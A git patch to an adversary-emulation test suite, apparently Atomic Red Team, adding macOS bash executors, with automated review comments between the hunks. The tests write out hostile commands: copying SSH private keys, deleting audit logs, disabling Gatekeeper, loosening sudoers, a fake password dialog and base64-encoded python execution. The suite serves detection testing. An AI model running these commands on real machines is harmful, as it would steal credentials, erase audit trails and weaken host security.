From 83dce0dcfa554aa69b0e2bf93ef541599ae35c1d Mon Sep 17 00:00:00 2001 
From: hypnoticpattern <45320229+hypnoticpattern@users.noreply.github.com> Date: Wed, 17 Jun 2020 18:57:14 -0700 Subject: [PATCH] Fix macOS tests (#1059) * Fix macOS tests * Fix typo in T1574.006 * Replaced zsh with bash, add prereq_command * Fix test name in T1053.004 Co-authored-by: Carrie Roberts --- atomics/T1027.001/T1027.001.yaml | 2 +- atomics/T1037.004/T1037.004.yaml | 5 +- atomics/T1040/T1040.yaml | 12 +++- atomics/T1053.004/T1053.004.yaml | 62 ++++++---------- ...am.plist => atomicredteam_T1053_004.plist} | 19 +++-- atomics/T1056.002/T1056.002.yaml | 2 +- atomics/T1059.002/T1059.002.yaml | 2 +- atomics/T1059.003/T1059.003.yaml | 2 +- atomics/T1059.004/T1059.004.yaml | 15 ++-- atomics/T1069.001/T1069.001.yaml | 2 +- atomics/T1083/T1083.yaml | 2 +- atomics/T1087.001/T1087.001.yaml | 2 +- atomics/T1090.001/T1090.001.yaml | 29 ++++++++ atomics/T1136.001/T1136.001.yaml | 2 +- atomics/T1518.001/T1518.001.yaml | 1 + atomics/T1543.001/T1543.001.yaml | 56 +++++++-------- .../src/atomicredteam_T1543_001.plist | 17 +++++ atomics/T1543.004/T1543.004.yaml | 52 ++++++++------ .../src/atomicredteam_T1543_004.plist | 15 ++++ atomics/T1546.014/src/T1546.014_emond.plist | 72 +++++++++---------- atomics/T1547.007/T1547.007.yaml | 5 +- atomics/T1548.003/T1548.003.yaml | 10 +-- atomics/T1551.002/T1551.002.yaml | 5 +- atomics/T1552.001/T1552.001.yaml | 3 +- atomics/T1552.004/T1552.004.yaml | 33 +++++++-- atomics/T1553.001/T1553.001.yaml | 3 +- atomics/T1555.001/T1555.001.yaml | 15 +++- atomics/T1560.001/T1560.001.yaml | 4 +- atomics/T1564.001/T1564.001.yaml | 5 ++ atomics/T1564.002/T1564.002.yaml | 5 +- atomics/T1569.001/T1569.001.yaml | 15 +++- atomics/T1574.006/T1574.006.yaml | 3 +- 32 files changed, 302 insertions(+), 175 deletions(-) rename atomics/T1053.004/src/{atomicredteam.plist => atomicredteam_T1053_004.plist} (56%) create mode 100644 atomics/T1543.001/src/atomicredteam_T1543_001.plist create mode 100644 atomics/T1543.004/src/atomicredteam_T1543_004.plist 
diff --git a/atomics/T1027.001/T1027.001.yaml b/atomics/T1027.001/T1027.001.yaml index 91329390..2b9e8f1d 100644 --- a/atomics/T1027.001/T1027.001.yaml +++ b/atomics/T1027.001/T1027.001.yaml @@ -22,7 +22,7 @@ atomic_tests: prereq_command: | if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; get_prereq_command: | - cp /bin/ls /tmp/evil-binary + cp /bin/ls #{file_to_pad} executor: command: | dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml index dd60024c..8b664b82 100644 --- a/atomics/T1037.004/T1037.004.yaml +++ b/atomics/T1037.004/T1037.004.yaml @@ -11,6 +11,7 @@ atomic_tests: - macos executor: command: | - echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common - name: sh + sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common + elevation_required: true + name: bash diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml index 38144e7a..e89014e9 100644 --- a/atomics/T1040/T1040.yaml +++ b/atomics/T1040/T1040.yaml @@ -33,10 +33,18 @@ atomic_tests: description: Specify interface to perform PCAP on. type: String default: en0A + dependency_executor_name: /bin/zsh + dependencies: + - description: | + Check if at least one of the tools are installed on the machine. + prereq_command: | + if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; + get_prereq_command: | + echo "Install tcpdump and/or tshark for the test to run."; exit 1; executor: command: | - tcpdump -c 5 -nnni #{interface} - tshark -c 5 -i #{interface} + sudo tcpdump -c 5 -nnni #{interface} + if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi; name: bash elevation_required: true - name: Packet Capture Windows Command Prompt diff --git a/atomics/T1053.004/T1053.004.yaml b/atomics/T1053.004/T1053.004.yaml index bf973427..5e16a975 100644 --- a/atomics/T1053.004/T1053.004.yaml 
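Review bot: `sudo echo osascript ... >> /etc/rc.common` elevates only the echo; the `>>` redirection is performed by the unprivileged shell, so for a non-root user the append to /etc/rc.common fails with permission denied even though `elevation_required: true` is now set. Route the write through the privileged process instead, e.g. `echo osascript -e 'tell app "Finder" to display dialog "Hello World"' | sudo tee -a /etc/rc.common`. The executor also has no `cleanup_command`, so the appended line persists in /etc/rc.common after the test; taking a copy of the file before the append and restoring it in cleanup would leave the host as found.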
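Review bot: `dependency_executor_name: /bin/zsh` in the T1040 hunk names a shell path rather than an executor; the other dependency blocks in this commit (T1543.001, T1543.004) use `dependency_executor_name: bash`, and the commit message says zsh was replaced by bash, so this looks like a leftover and should be `dependency_executor_name: bash`. The prereq accepts a host that has only tshark, but the executor then runs `sudo tcpdump -c 5 -nnni #{interface}` unconditionally while only the tshark call is guarded; guard it the same way, `if [ -x "$(command -v tcpdump)" ]; then sudo tcpdump -c 5 -nnni #{interface}; fi;`. The dependency description `Check if at least one of the tools are installed` should read `is installed`.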
+++ b/atomics/T1053.004/T1053.004.yaml @@ -10,45 +10,25 @@ atomic_tests: supported_platforms: - macos - - linux - + input_arguments: + script_location: + description: evil plist location + type: path + default: $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist + script_destination: + description: Path where to move the evil plist + type: path + default: /etc/emond.d/rules/atomicredteam_T1053_004.plist + empty_file: + description: Random name of the empty file used to trigger emond service + type: string + default: randomflag executor: - name: manual - steps: | - 1. Place this file in /etc/emond.d/rules/atomicredteam.plist - - - - - - name - atomicredteam - enabled - - eventTypes - - startup - - actions - - - command - /usr/bin/say - user - root - arguments - - -v Tessa - I am a persistent startup item. - - type - RunCommand - - - - - - - 2. Place an empty file in /private/var/db/emondClients/ - - 3. sudo touch /private/var/db/emondClients/randomflag \ No newline at end of file + name: bash + elevation_required: true + command: | + sudo cp #{script_location} #{script_destination} + sudo touch /private/var/db/emondClients/#{empty_file} + cleanup_command: | + sudo rm #{script_destination} + sudo rm /private/var/db/emondClients/#{empty_file} diff --git a/atomics/T1053.004/src/atomicredteam.plist b/atomics/T1053.004/src/atomicredteam_T1053_004.plist similarity index 56% rename from atomics/T1053.004/src/atomicredteam.plist rename to atomics/T1053.004/src/atomicredteam_T1053_004.plist index 62bdcff4..082280e2 100644 --- a/atomics/T1053.004/src/atomicredteam.plist +++ b/atomics/T1053.004/src/atomicredteam_T1053_004.plist @@ -4,7 +4,7 @@ name - atomicredteam + com.atomicredteam.t1053_004 enabled eventTypes 
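Review bot: Nothing checks that `#{script_location}` exists before `sudo cp #{script_location} #{script_destination}`, unlike the T1543.001/T1543.004 hunks in this commit which add a `dependencies` block for their plist path; the same `if [ -f #{script_location} ]; then exit 0; else exit 1; fi;` prereq here would give a clear failure instead of a cp error under sudo. The cleanup removes the rule file and the emondClients flag but not `/tmp/T1053_004_atomicredteam`, which the renamed plist's touch action creates (see the plist hunk below), so `sudo rm -f /tmp/T1053_004_atomicredteam` belongs in `cleanup_command` too. Both `sudo rm` lines should be `sudo rm -f` so that cleanup of a partially run test does not stop at the first missing file.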
@@ -15,13 +15,24 @@ command - /usr/bin/say + /usr/bin/sleep user root arguments - -v Tessa - I am a persistent startup item. + 10 + + type + RunCommand + + + command + /usr/bin/touch + user + root + arguments + + /tmp/T1053_004_atomicredteam type RunCommand diff --git a/atomics/T1056.002/T1056.002.yaml b/atomics/T1056.002/T1056.002.yaml index 0254866a..d65f56da 100644 --- a/atomics/T1056.002/T1056.002.yaml +++ b/atomics/T1056.002/T1056.002.yaml @@ -11,7 +11,7 @@ atomic_tests: executor: command: | osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"' - name: sh + name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 description: | diff --git a/atomics/T1059.002/T1059.002.yaml b/atomics/T1059.002/T1059.002.yaml index ae0a155f..a86f1a93 100644 --- a/atomics/T1059.002/T1059.002.yaml +++ b/atomics/T1059.002/T1059.002.yaml @@ -13,6 +13,6 @@ atomic_tests: - macos executor: command: | - osascript -e \"do shell script \\\"echo \\\\\\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\\\\\\\" | python &\\\"\" + osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\\\" | python &\"" name: sh diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index 1b047d6a..85f304d8 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml 
@@ -13,7 +13,7 @@ atomic_tests: type: string default: dir script_path: - description: Path of script to create. + description: Script path. type: path default: $env:TEMP\T1059.003_script.bat dependency_executor_name: powershell diff --git a/atomics/T1059.004/T1059.004.yaml b/atomics/T1059.004/T1059.004.yaml index a5c2e508..1c67ef01 100644 --- a/atomics/T1059.004/T1059.004.yaml +++ b/atomics/T1059.004/T1059.004.yaml @@ -8,12 +8,19 @@ atomic_tests: supported_platforms: - macos - linux + input_arguments: + script_path: + description: Script path + type: path + default: /tmp/art.sh executor: command: | - sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" - sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh" - chmod +x /tmp/art.sh - sh /tmp/art.sh + sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}" + sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}" + chmod +x #{script_path} + sh #{script_path} + cleanup_command: | + rm #{script_path} name: sh - name: Command-Line Interface auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c diff --git a/atomics/T1069.001/T1069.001.yaml b/atomics/T1069.001/T1069.001.yaml index 566d5564..1a050f98 100644 --- a/atomics/T1069.001/T1069.001.yaml +++ b/atomics/T1069.001/T1069.001.yaml @@ -10,7 +10,7 @@ atomic_tests: - linux executor: command: | - if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi; + if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi; if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi; name: sh diff --git a/atomics/T1083/T1083.yaml b/atomics/T1083/T1083.yaml index 3d2fec52..f86c8fcf 100644 --- a/atomics/T1083/T1083.yaml 
+++ b/atomics/T1083/T1083.yaml @@ -78,7 +78,7 @@ atomic_tests: cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file} if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi; find . -type f -iname *.pdf >> #{output_file} - cat #{output_file}; fi; + cat #{output_file} find . -type f -name ".*" cleanup_command: 'rm #{output_file}' name: sh diff --git a/atomics/T1087.001/T1087.001.yaml b/atomics/T1087.001/T1087.001.yaml index 9538c8d8..55e8968a 100644 --- a/atomics/T1087.001/T1087.001.yaml +++ b/atomics/T1087.001/T1087.001.yaml @@ -34,7 +34,7 @@ atomic_tests: default: /tmp/T1087.001.txt executor: command: | - cat /etc/sudoers > #{output_file} + sudo cat /etc/sudoers > #{output_file} cat #{output_file} cleanup_command: | rm -f #{output_file} diff --git a/atomics/T1090.001/T1090.001.yaml b/atomics/T1090.001/T1090.001.yaml index 1e1ada87..8c0f7dec 100644 --- a/atomics/T1090.001/T1090.001.yaml +++ b/atomics/T1090.001/T1090.001.yaml 
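Review bot: `elevation_required: true` is not visible for the T1087.001 executor whose command now starts with `sudo cat /etc/sudoers > #{output_file}`; the executor's other keys are outside the hunk, but the other hunks in this commit that introduce sudo (T1551.002, T1553.001) set that flag, so it should be added here if it is not already present. The redirection itself runs unprivileged, which is fine since `#{output_file}` defaults to /tmp.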
@@ -26,6 +26,35 @@ atomic_tests: unset http_proxy unset https_proxy name: sh +- name: Connection Proxy for macOS UI + description: | + Enable traffic redirection on macOS UI (not terminal). + The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface. + + Note that this test may conflict with pre-existing system configuration. + supported_platforms: + - macos + input_arguments: + proxy_server: + description: Proxy server URL (host) + type: string + default: 127.0.0.1 + proxy_port: + description: Proxy server port + type: string + default: 8080 + interface: + description: Protocol to proxy (http or https) + type: string + default: Wi-Fi + executor: + name: sh + command: | + networksetup -setwebproxy #{interface} #{proxy_server} #{proxy_port} + networksetup -setsecurewebproxy #{interface} #{proxy_server} #{proxy_port} + cleanup_command: | + networksetup -setwebproxystate #{interface} off + networksetup -setsecurewebproxystate #{interface} off - name: portproxy reg key auto_generated_guid: b8223ea9-4be2-44a6-b50a-9657a3d4e72a description: | diff --git a/atomics/T1136.001/T1136.001.yaml b/atomics/T1136.001/T1136.001.yaml index 39aeb4b6..c555483e 100644 --- a/atomics/T1136.001/T1136.001.yaml +++ b/atomics/T1136.001/T1136.001.yaml @@ -37,7 +37,7 @@ atomic_tests: executor: command: | dscl . -create /Users/#{username} - dscl . -create /Users/#{username} UserShell /bin/bash + dscl . -create /Users/#{username} UserShell /bin/zsh dscl . -create /Users/#{username} RealName "#{realname}" dscl . -create /Users/#{username} UniqueID "1010" dscl . -create /Users/#{username} PrimaryGroupID 80 diff --git a/atomics/T1518.001/T1518.001.yaml b/atomics/T1518.001/T1518.001.yaml index 998cef68..856dfeaf 100644 --- a/atomics/T1518.001/T1518.001.yaml +++ b/atomics/T1518.001/T1518.001.yaml 
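Review bot: The `interface` argument's description, `Protocol to proxy (http or https)`, does not match its use: its default is `Wi-Fi` and both `networksetup` calls pass it as the network service name, so it should read something like `Network service whose proxy settings are changed (see networksetup -listallnetworkservices)`. `networksetup -setwebproxy` changes system network settings and normally needs an administrator, yet the executor sets neither `elevation_required: true` nor `sudo`, unlike the other macOS tests in this commit. `default: 8080` for `proxy_port` parses as an integer although the argument is typed `string`; `default: "8080"` keeps value and declared type consistent. The cleanup only switches the proxies off and cannot restore a previously configured host/port, which the description acknowledges; capturing `networksetup -getwebproxy #{interface}` before the change would let the cleanup restore it.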
@@ -46,6 +46,7 @@ atomic_tests: command: | ps -ef | grep Little\ Snitch | grep -v grep ps aux | grep CbOsxSensorService + ps aux | grep falcond name: sh - name: Security Software Discovery - Sysmon Service auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 diff --git a/atomics/T1543.001/T1543.001.yaml b/atomics/T1543.001/T1543.001.yaml index dd555d4f..14771b3d 100644 --- a/atomics/T1543.001/T1543.001.yaml +++ b/atomics/T1543.001/T1543.001.yaml @@ -7,34 +7,32 @@ atomic_tests: Create a plist and execute it supported_platforms: - macos + input_arguments: + plist_filename: + description: filename + type: string + default: com.atomicredteam.plist + path_malicious_plist: + description: Name of file to store in cron folder + type: string + default: $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist + + dependency_executor_name: bash + dependencies: + - description: | + The shared library must exist on disk at specified location (#{path_to_shared_library}) + prereq_command: | + if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; + get_prereq_command: | + echo "The shared library doesn't exist. Check the path"; exit 1; executor: - steps: | - 1. Create file - .client - - 2. osascript -e 'tell app "Finder" to display dialog "Hello World"' - - 3. Place the following in a new file under ~/Library/LaunchAgents as com.atomicredteam.plist - - 4. - - - - - KeepAlive - - Label - com.client.client - ProgramArguments - - /Users//.client - - RunAtLoad - - NSUIElement - 1 - - - - 5. launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist - name: manual + name: bash + elevation_required: true + command: | + if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi; + sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename} + sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename} + cleanup: | + sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename} + sudo rm ~/Library/LaunchAgents/#{plist_filename} 
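Review bot: `ps aux | grep falcond` matches the grep process itself, so the line produces a hit whether or not a falcond process is running; the first line of this command already handles that with `| grep -v grep`, so the new line should be `ps aux | grep falcond | grep -v grep` (or `pgrep -l falcond`). The `CbOsxSensorService` line above it has the same problem, though that is pre-existing.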
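Review bot: `cleanup: |` in the T1543.001 executor is not the key the other executors in this commit use — T1053.004, T1059.004 and T1552.004 all write `cleanup_command:` — and an executor key the runner does not recognise means the LaunchAgent is never unloaded or removed; rename it `cleanup_command: |` here and in the T1543.004 and T1547.007 hunks, which carry the same key. The dependency text is copied from the shared-library test: `#{path_to_shared_library}` is not an input argument of this test (nothing would substitute it), `Name of file to store in cron folder` does not describe `path_malicious_plist`, and the get_prereq message talks about a shared library; the description should reference `#{path_malicious_plist}` and say `Path of the plist to install as a LaunchAgent`, as the T1543.004 hunk's message already does. The plist loaded here creates `/tmp/T1543_001_atomicredteam.txt` (see its hunk below), which the cleanup leaves behind. Copying with `sudo cp` into `~/Library/LaunchAgents` and loading with `sudo launchctl load -w` installs a root-owned file into the user's agent directory and loads a per-user agent from root's launchctl context; if the agent is meant to run as the user, the `sudo` on these lines is probably unnecessary — worth confirming on a macOS host.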
diff --git a/atomics/T1543.001/src/atomicredteam_T1543_001.plist b/atomics/T1543.001/src/atomicredteam_T1543_001.plist new file mode 100644 index 00000000..3664e1aa --- /dev/null +++ b/atomics/T1543.001/src/atomicredteam_T1543_001.plist @@ -0,0 +1,17 @@ + + + + + Label + com.atomicredteam.t1543_001 + ProgramArguments + + touch + /tmp/T1543_001_atomicredteam.txt + + RunAtLoad + + NSUIElement + 1 + + diff --git a/atomics/T1543.004/T1543.004.yaml b/atomics/T1543.004/T1543.004.yaml index cabccc3f..a806db85 100644 --- a/atomics/T1543.004/T1543.004.yaml +++ b/atomics/T1543.004/T1543.004.yaml 
@@ -5,26 +5,34 @@ atomic_tests: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: | Utilize LaunchDaemon to launch `Hello World` - supported_platforms: - - macos - executor: - steps: | - 1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons - 2. - - - - - Label - com.example.hello - ProgramArguments - - hello - world - - KeepAlive - - - - name: manual + + supported_platforms: + - macos + + input_arguments: + plist_filename: + description: filename + type: string + default: com.atomicredteam.plist + path_malicious_plist: + description: Name of file to store in cron folder + type: string + default: $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist + dependency_executor_name: bash + dependencies: + - description: | + The shared library must exist on disk at specified location (#{path_to_shared_library}) + prereq_command: | + if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; + get_prereq_command: | + echo "The plist file doesn't exist. Check the path and try again."; exit 1; + executor: + name: bash + elevation_required: true + command: | + sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} + sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} + cleanup: | + sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} + sudo rm /Library/LaunchDaemons/#{plist_filename} diff --git a/atomics/T1543.004/src/atomicredteam_T1543_004.plist b/atomics/T1543.004/src/atomicredteam_T1543_004.plist new file mode 100644 index 00000000..fec42ec6 --- /dev/null +++ b/atomics/T1543.004/src/atomicredteam_T1543_004.plist @@ -0,0 +1,15 @@ + + + + + Label + com.atomicredteam.t1543_004 + ProgramArguments + + touch + /tmp/T1543_004_atomicredteam.txt + + KeepAlive + + + diff --git a/atomics/T1546.014/src/T1546.014_emond.plist b/atomics/T1546.014/src/T1546.014_emond.plist index 69b2b778..ef00a146 100644 --- a/atomics/T1546.014/src/T1546.014_emond.plist 
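Review bot: launchd refuses to load a daemon from /Library/LaunchDaemons unless the plist is owned by root:wheel and not writable by group or others, and `sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}` creates the destination with the checked-out source file's permission bits, so the following `launchctl load -w` can fail with a bad-ownership/permissions error depending on how the repository was cloned; add `sudo chown root:wheel /Library/LaunchDaemons/#{plist_filename}` and `sudo chmod 644 /Library/LaunchDaemons/#{plist_filename}` before the load. With `KeepAlive` true and a `touch` that exits immediately, launchd will keep respawning the job (throttled) for as long as it stays loaded between the test and cleanup; `RunAtLoad` without `KeepAlive`, as the new T1543.001 plist uses, runs it once. `/tmp/T1543_004_atomicredteam.txt` created by that job is also not removed by the cleanup.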
+++ b/atomics/T1546.014/src/T1546.014_emond.plist @@ -4,42 +4,40 @@ name - Atomic Red Team T1165 - enabled - - eventTypes - - startup - - actions - - - command - /bin/sleep - user - root - arguments - - 30 - - type - RunCommand - - - command - /usr/bin/say - user - root - arguments - - -v - Karen - Hello from Atomic Red Team technique T1165 - - type - RunCommand - - - + AtomicRedTeam_T1546_014 + enabled + + eventTypes + + startup + + actions + + + command + /usr/bin/sleep + user + root + arguments + + 10 + + type + RunCommand + + + command + /usr/bin/touch + user + root + arguments + + /tmp/T1546_014_atomicredteam + + type + RunCommand + + + diff --git a/atomics/T1547.007/T1547.007.yaml b/atomics/T1547.007/T1547.007.yaml index aeee40dd..69c90673 100644 --- a/atomics/T1547.007/T1547.007.yaml +++ b/atomics/T1547.007/T1547.007.yaml @@ -35,5 +35,8 @@ atomic_tests: executor: command: | sudo defaults write com.apple.loginwindow LoginHook #{script} + cleanup: | sudo defaults delete com.apple.loginwindow LoginHook - name: sh \ No newline at end of file + elevation_required: true + name: sh + \ No newline at end of file diff --git a/atomics/T1548.003/T1548.003.yaml b/atomics/T1548.003/T1548.003.yaml index 149fc83f..a6f671a8 100644 --- a/atomics/T1548.003/T1548.003.yaml +++ b/atomics/T1548.003/T1548.003.yaml @@ -14,11 +14,11 @@ atomic_tests: executor: name: sh + elevation_required: true command: | - sudo -l - sudo su - cat /etc/sudoers - vim /etc/sudoers + sudo -l + sudo cat /etc/sudoers + sudo vim /etc/sudoers - name: Unlimited sudo cache timeout auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc @@ -31,6 +31,7 @@ atomic_tests: executor: name: sh + elevation_required: true command: | sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers sudo visudo -c -f /etc/sudoers 
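Review bot: `sudo vim /etc/sudoers` in the first T1548.003 hunk opens an interactive editor; under a non-interactive executor it either blocks waiting for a terminal or exits with an error, so the test never completes cleanly. The discovery intent of this command is already covered by `sudo -l` and `sudo cat /etc/sudoers`; if an edit attempt is wanted, `sudo visudo -c -f /etc/sudoers` (the syntax check the later hunks use) is the non-interactive form.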
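Review bot: `sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers` is a context line in the second T1548.003 hunk, but since this commit targets macOS it is worth noting that BSD sed requires an argument to `-i` (an empty suffix, `sed -i ''`), so as written the expression is consumed as the backup suffix and the command fails before `visudo -c` runs. A portable form is to edit a temporary copy, check it with `sudo visudo -c -f`, and install it with `cp`. No cleanup that restores the original `env_reset` line is visible in this hunk; the enclosing executor continues outside it, so this may already be handled — please confirm.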
@@ -46,6 +47,7 @@ atomic_tests: executor: name: sh + elevation_required: true command: | sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers" sudo visudo -c -f /etc/sudoers \ No newline at end of file diff --git a/atomics/T1551.002/T1551.002.yaml b/atomics/T1551.002/T1551.002.yaml index 2397e36b..e9b1fbfe 100644 --- a/atomics/T1551.002/T1551.002.yaml +++ b/atomics/T1551.002/T1551.002.yaml @@ -10,9 +10,10 @@ atomic_tests: - linux executor: command: | - rm -rf /private/var/log/system.log* - rm -rf /private/var/audit/* + sudo rm -rf /private/var/log/system.log* + sudo rm -rf /private/var/audit/* name: sh + elevation_required: true - name: Overwrite Linux Mail Spool auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4 description: | diff --git a/atomics/T1552.001/T1552.001.yaml b/atomics/T1552.001/T1552.001.yaml index 66bb8492..5bd597e8 100644 --- a/atomics/T1552.001/T1552.001.yaml +++ b/atomics/T1552.001/T1552.001.yaml @@ -10,7 +10,8 @@ atomic_tests: executor: command: | python2 laZagne.py all - name: sh + elevation_required: true + name: bash - name: Extract passwords with grep auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 description: | diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml index d03bbcbe..91df1ceb 100644 --- a/atomics/T1552.004/T1552.004.yaml +++ b/atomics/T1552.004/T1552.004.yaml 
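Review bot: `supported_platforms` for the T1551.002 test still lists `- linux` (context line above the executor), but both commands target macOS-only paths (`/private/var/log/system.log*`, `/private/var/audit/*`), so on Linux the test removes nothing and reports success; either drop `- linux` or add the Linux equivalents. Both deletions are irreversible and no cleanup is possible, which the test description should state explicitly so a runner knows the host's audit trail will be lost.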
@@ -21,14 +21,20 @@ atomic_tests: - macos - linux input_arguments: + search_path: + description: Path where to start searching from. + type: path + default: / output_file: description: Output file containing locations of SSH key files type: path default: /tmp/keyfile_locations.txt executor: command: | - find / -name id_rsa >> #{output_file} - find / -name id_dsa >> #{output_file} + find #{search_path} -name id_rsa >> #{output_file} + find #{search_path} -name id_dsa >> #{output_file} + cleanup_command: | + rm #{output_file} name: sh - name: Copy Private SSH Keys with CP auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 @@ -37,6 +43,10 @@ atomic_tests: supported_platforms: - linux input_arguments: + search_path: + description: Path where to start searching from. + type: path + default: / output_folder: description: Output folder containing copies of SSH private key files type: path @@ -44,8 +54,10 @@ atomic_tests: executor: command: | mkdir #{output_folder} - find / -name id_rsa -exec cp --parents {} #{output_folder} \; - find / -name id_dsa -exec cp --parents {} #{output_folder} \; + find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \; + find #{search_path} -name id_dsa -exec cp --parents {} #{output_folder} \; + cleanup_command: | + rm #{output_folder} name: sh - name: Copy Private SSH Keys with rsync auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a @@ -55,6 +67,10 @@ atomic_tests: - macos - linux input_arguments: + search_path: + description: Path where to start searching from. + type: path + default: / output_folder: description: Output folder containing copies of SSH private key files type: path 
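Review bot: `rm #{output_folder}` in the new cleanup of the "Copy Private SSH Keys with CP" test (third hunk) targets the directory created by `mkdir #{output_folder}`, and `rm` without `-r` refuses to remove a directory, so the cleanup never deletes the copied keys; the rsync variant in the following hunk already uses `rm -rf #{output_folder}`, and this one should match. Leaving copies of private SSH keys on disk after the test is the worst outcome of a silently failing cleanup here.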
@@ -62,6 +78,9 @@ atomic_tests: executor: command: | mkdir #{output_folder} - find / -name id_rsa -exec rsync -R {} #{output_folder} \; - find / -name id_dsa -exec rsync -R {} #{output_folder} \; - name: sh \ No newline at end of file + find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \; + find #{search_path} -name id_dsa -exec rsync -R {} #{output_folder} \; + cleanup_command: | + rm -rf #{output_folder} + name: sh + \ No newline at end of file diff --git a/atomics/T1553.001/T1553.001.yaml b/atomics/T1553.001/T1553.001.yaml index 29de7fe1..ed174aa8 100644 --- a/atomics/T1553.001/T1553.001.yaml +++ b/atomics/T1553.001/T1553.001.yaml @@ -16,4 +16,5 @@ atomic_tests: command: | sudo xattr -r -d com.apple.quarantine #{app_path} sudo spctl --master-disable - name: sh \ No newline at end of file + elevation_required: true + name: sh diff --git a/atomics/T1555.001/T1555.001.yaml b/atomics/T1555.001/T1555.001.yaml index cdc9c380..1e53ce65 100644 --- a/atomics/T1555.001/T1555.001.yaml +++ b/atomics/T1555.001/T1555.001.yaml @@ -17,9 +17,18 @@ atomic_tests: [Keychain dumper](https://github.com/juuso/keychaindump) supported_platforms: - macos + input_arguments: + cert_import: + description: Specify the path of the certificates to import. + type: path + default: /tmp/certs.pem + cert_export: + description: Specify the path of the certificates to export. + type: path + default: /tmp/certs.pem executor: command: | security -h - security find-certificate -a -p > allcerts.pem - security import /tmp/certs.pem -k - name: sh \ No newline at end of file + security find-certificate -a -p > #{cert_export} + security import #{cert_export} -k + name: sh diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index f920e406..13a1b1f6 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ b/atomics/T1560.001/T1560.001.yaml 
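Review bot: `sudo spctl --master-disable` in the T1553.001 executor turns Gatekeeper off system-wide and the executor has no `cleanup_command`, so the host stays with Gatekeeper disabled after the test; add `cleanup_command: |` with `sudo spctl --master-enable`. The removed quarantine attribute on `#{app_path}` cannot be meaningfully restored, which the test description could note.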
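Review bot: `cert_import` in the T1555.001 hunk is declared as an input argument but never referenced: both new command lines use `#{cert_export}`, so the import path cannot be changed and the argument is dead. Either drop `cert_import` or make the import line `security import #{cert_import} -k`, and say in both descriptions that the file is PEM, as the defaults imply. `security import` expects a keychain name after `-k` and none is given, so that call may fail on argument parsing rather than import anything — worth checking on a macOS host.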
